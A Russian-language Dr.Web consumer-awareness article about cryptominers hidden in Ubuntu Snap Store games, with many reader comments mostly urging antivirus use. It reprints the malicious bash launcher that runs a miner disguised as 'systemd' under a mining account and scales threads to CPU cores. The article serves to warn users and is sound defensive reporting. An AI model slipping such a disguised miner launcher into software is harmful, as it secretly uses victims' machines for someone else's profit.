«Моя первая Ferrari»

Незваные гости

добавить в избранное

«Моя первая Ferrari»

Прочитали: 18445 Комментариев: 75 Рейтинг: 111

25 мая 2018

Энкодеры для Linux – не новость; чего уж там, мы же первый и нашли. Майнеры для «линуксов» тоже известны – обычные, не вредоносные. Но было бы странно, если бы на волне популярности злоумышленники не попытались немного подзаработать за счет простых пользователей этой операционной системы.

В популярном дистрибутиве Ubuntu с недавних пор появился новый формат приложений – snap-пакет. Соответственно, появился и официальный магазин, наподобие Windows Store и прочих. И все это – чтобы пользователю было проще работать с системой. Вот только проверять приложения, добавляемые в магазин, никто не собирался.

Бдительный пользователь обнаружил в коде игрушки майнер криптовалют и скрипт, прописывающий автоматический запуск этого майнера.

Открытый код – хорошая штука, можно сразу увидеть все вредоносные планы приложения. А выглядят они примерно так:


#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

https://github.com/canonical-websites/snapcraft.io/issues/651

Вот только почему-то никто этого не замечал. Мало того, подобные майнеры и скрипты оказались и в других приложениях того же автора. Вредоносный код добывал криптовалюту для пользователя с адресом, который по-русски звучит как «моя первая Ferrari». Счётчика скачиваний или установок в Ubuntu Snap Store нет, поэтому узнать, успел ли вирусописатель накопить на машину мечты, доподлинно неизвестно.

#Linux #игры #майнинг

Антивирусная правДА! рекомендует

Используя Linux, не теряйте бдительности. Даже то, что исходники ПО с открытым кодом может проверить каждый, совершенно не означает, что этот «каждый» что-то проверяет. Зачастую, как показывает практика, каждый надеется на кого-то другого, в то время как вредоносный код или опасная уязвимость распространяется на множество рабочих станций и серверов.
Либо проверяйте код каждой программы, которую собираетесь скачать и установить, либо используйте антивирус. Не ждите милости с неба!

Оцените выпуск

Чтобы проголосовать зайдите в аккаунт на сайте или создайте его, если аккаунта еще нет.

Сделайте репост

Необходимо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.

Нам важно ваше мнение

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей

Денисенко Павел Андреевич
13:02:59 2018-08-03

Исходный код ПО реально может быть поддельным.

Сергей
20:04:03 2018-05-28

Антивирус просто необходим.Это истина!

anatol
19:04:09 2018-05-28

разумеется - антивирус

З...ч
18:44:06 2018-05-28

С учетом того что современные пакеты, ну очень большие, и исходники перелопачивать просто не реально одному user'у. Поэтому подошло время и любимый нами Linux защищать антивирусом. В свое время говорили: "Вирусы на Linux, только дело времени, которое чем больше пользователей, тем ближе". Ну в такой ситуации как в статье, самая главная уязвимость любой системы - человек, ну или пользователь.

razgen Собкор
16:07:38 2018-05-28

Бдительность ещё никогда и никому не помешала, в любой ситуации.

МЕДВЕДЬ
14:49:39 2018-05-28

Линуксом не пользуюсь,но все равно спасибо.

Константин
20:55:54 2018-05-26

Много кто утверждал,что Линукс вирусы не берут, Dr.Web - молодцы!!!

zsergey
17:01:09 2018-05-26

На Линуксе тоже зловреды бывают, Доктор защитит.

Lia00 Собкор
23:36:10 2018-05-25

какие только вредоносные программы не придумают...

Littlefish Собкор
23:24:46 2018-05-25

Одно время пользовался линуксом, но с каждым новым обновлением ноутбук загружался всё медленнее и медленнее, программы открывались всё дольше и дольше... Пришлось вернутся назад на винду. С совместимостью у линукса с "железом" реальные проблемы. При всей багованности винды всё таки она корректнее работает (заговор производителей комплектующих с дядюшкой Билли?) и даже при её глюках быстрее можно найти решение какой-либо проблемы.

Littlefish Собкор
23:14:57 2018-05-25

Что толку иметь феррари, если у неё пустой бак (с) MASH

Littlefish Собкор
23:11:32 2018-05-25

Если хочешь что-то спрятать - положи на видном месте. Так и тут. Исходный код - открытый, его можно прочитать, но мало кто это делает. А если кто-нибудь и делает, то не факт, что человек без специальной подготовки увидит, что программа делает что-то не то.

В...а
22:59:46 2018-05-25

Криптовалюта? Феррари? И жажда наживы... Злые слова какие-то..

НинаК
22:41:22 2018-05-25

А кто-то рассказывал мне, что Линукс - это всегда безопасно... подарю ему на день рождения наш антивирус!

vla_va
22:36:18 2018-05-25

Необычная открытая наглость!

I23
22:32:32 2018-05-25

За всем сам не уследишь - держи хороший антивирус в тонусе

Lenba
22:28:05 2018-05-25

Антивирус типа DrWeb, надеюсь, нам поможет

Zserg
22:16:25 2018-05-25

Что это за новый формат приложений – snap-пакет?

Владимир
22:06:31 2018-05-25

Куда там, что-бы проверять каждое приложение куда заходишь - употеешь, уж лучше надежный антивирус.

Dvakota
21:59:25 2018-05-25

Какая уж там милость ! Только держись за карманы , столько желающих обчистить !

Альфа
21:56:33 2018-05-25

@Natalya_2017, это вы верно заметили. Соглашусь с вами.

Andromeda
21:46:33 2018-05-25

С линуксом не работала, конечно. Но почитать было познавательно.

Шалтай Александр Болтай Собкор
21:44:34 2018-05-25

Бывает так, копишь—копишь на феррари, а потом вдруг срываешься и покупаешь проездной на трамвай.

duduka
21:42:28 2018-05-25

не пользуюсь, но соет все равно хорош

Геральт Собкор
21:37:42 2018-05-25

Всецело полагаюсь на Dr.Web 11.

orw_mikle
21:18:27 2018-05-25

Спасибо за совет, но Linux не используем.

anatol
21:17:25 2018-05-25

нет уж, буду полагаться на Dr.Web

marisha-san Собкор
16:28:41 2018-05-25

Никогда не пользовался Линуксом и не планирую.Такого же мнения.

La folle
16:22:48 2018-05-25

В любом случае антивирус необходим!

Toma
15:41:01 2018-05-25

Если все установят Dr.Web не заработать ему на Ferrari.

Damir Собкор
15:07:36 2018-05-25

Не теряйте бдительность, а лучше установите антивирус.

Дмитрий
15:00:33 2018-05-25

Не планирую пользовался Linux, проверка не помешает. Без антивируса не обойтись.

znamy
14:28:33 2018-05-25

Сейчас многие на Линукс переходят,но как видно и здесь без антивируса никак.

Masha
14:26:19 2018-05-25

Антивирус обязательно нужен в любых ОС.

vinnetou
14:04:59 2018-05-25

Никогда не пользовался Линуксом,а вот антивирусом пользуюсь всегда!!!

L1t1um
13:44:59 2018-05-25

Благодарю за статью и за защиту! Как здорово, что и Linux под защитой Dr.Web. Хотя я пользовался Linux непродолжительное время, но всё возможно...

robot
13:34:37 2018-05-25

Да здравствует Великий Авось!!! Никогда не пользовался Линуксом и не планирую.

Татьяна
13:28:52 2018-05-25

Я не смогу определить вредоносный это код или нет. Поэтому выбираю Dr.Web!

ArtemiyKurs
13:12:30 2018-05-25

Нормальным людям уже давно известно что Линукс уже не настолько безопасна как это было лет так 5-7 назад.

B0RIS
12:59:11 2018-05-25

Спасибо за советы. Хорошая статья.Познавательная.

sanek-xf
12:56:49 2018-05-25

Я вот с Линуксом вообще не работал никогда. Но прочитал с интересом.

Alexander Собкор
12:34:08 2018-05-25

И Linux туда же, чтоб нам не пели,
Код нам открыли, - на шею присели.
Не ждите милостей, они уже с вами,
Эти милые чьи-то Ferrari.

Система прекрасна, спора тут нет,
И майнеру нравится, шлет нам привет.
Как гостя незваного не допустить? -
Вебером надо его укротить!

Привратник толковый,
Внимательный, скорый,
И встретит он, и просветит,
Допустит или удалит,
Иль вытолкнет без спора.

Biggurza Собкор
12:16:46 2018-05-25

Выражаю огромную благодарность авторам проекта "Антивирусная ПравДА! за оказанное внимание и награду за мое скромное участие!
Друзья, всем спасибо за поздравления, всех благодарю, всех ценю, всех обнимаю!
Рад быть и оставаться активным участником проекта.

К сегодняшнему выпуску:

Мечта: Феррари – нет проблем!
Лишь заработать кучу бабок,
И вот, ты мчишься по ухабам,
Рукою машешь – всем привет!

А коли в код прошил майнёр,
И юзерам софтину скинул,
То не робщи – на половину
Уж ты в колонии, пижон.

И юзерам немного быть
С софтом внимательнее. Строго,
Паук научит, хоть немного,
Средь козней майнера прожить.

maestro431
12:13:12 2018-05-25

Установите Антивирус!

Неуёмный Обыватель Собкор
12:01:29 2018-05-25

Пока кто-то надеется на свободность и прозрачность ПО, другой копит на Феррари на этой вере.

I46
11:34:58 2018-05-25

На Linux надейся, а сам не плошай!

Ruslan
11:25:30 2018-05-25

Доверяй - но проверяй! Спасибо!

EvgenyZ
11:04:51 2018-05-25

Для Linux тоже нужен антивирус.

Самуил Христианин
10:45:12 2018-05-25

Лишняя проверка никогда не помешает. И не стоит так доверять производителю.

Natalya_2017
10:38:31 2018-05-25

Название интересное...
Деньги,деньги... Никогда и никому они не дают покоя..

Комментарии к другим выпускам | Мои комментарии

Главная

Выпуски

Рубрики

Рейтинг

О проекте

Статистика

Избранное

Инструменты

Антивирусная правДА!TM

«Моя первая Ferrari»

Антивирусная правДА! рекомендует

Нам важно ваше мнение

Комментарии пользователей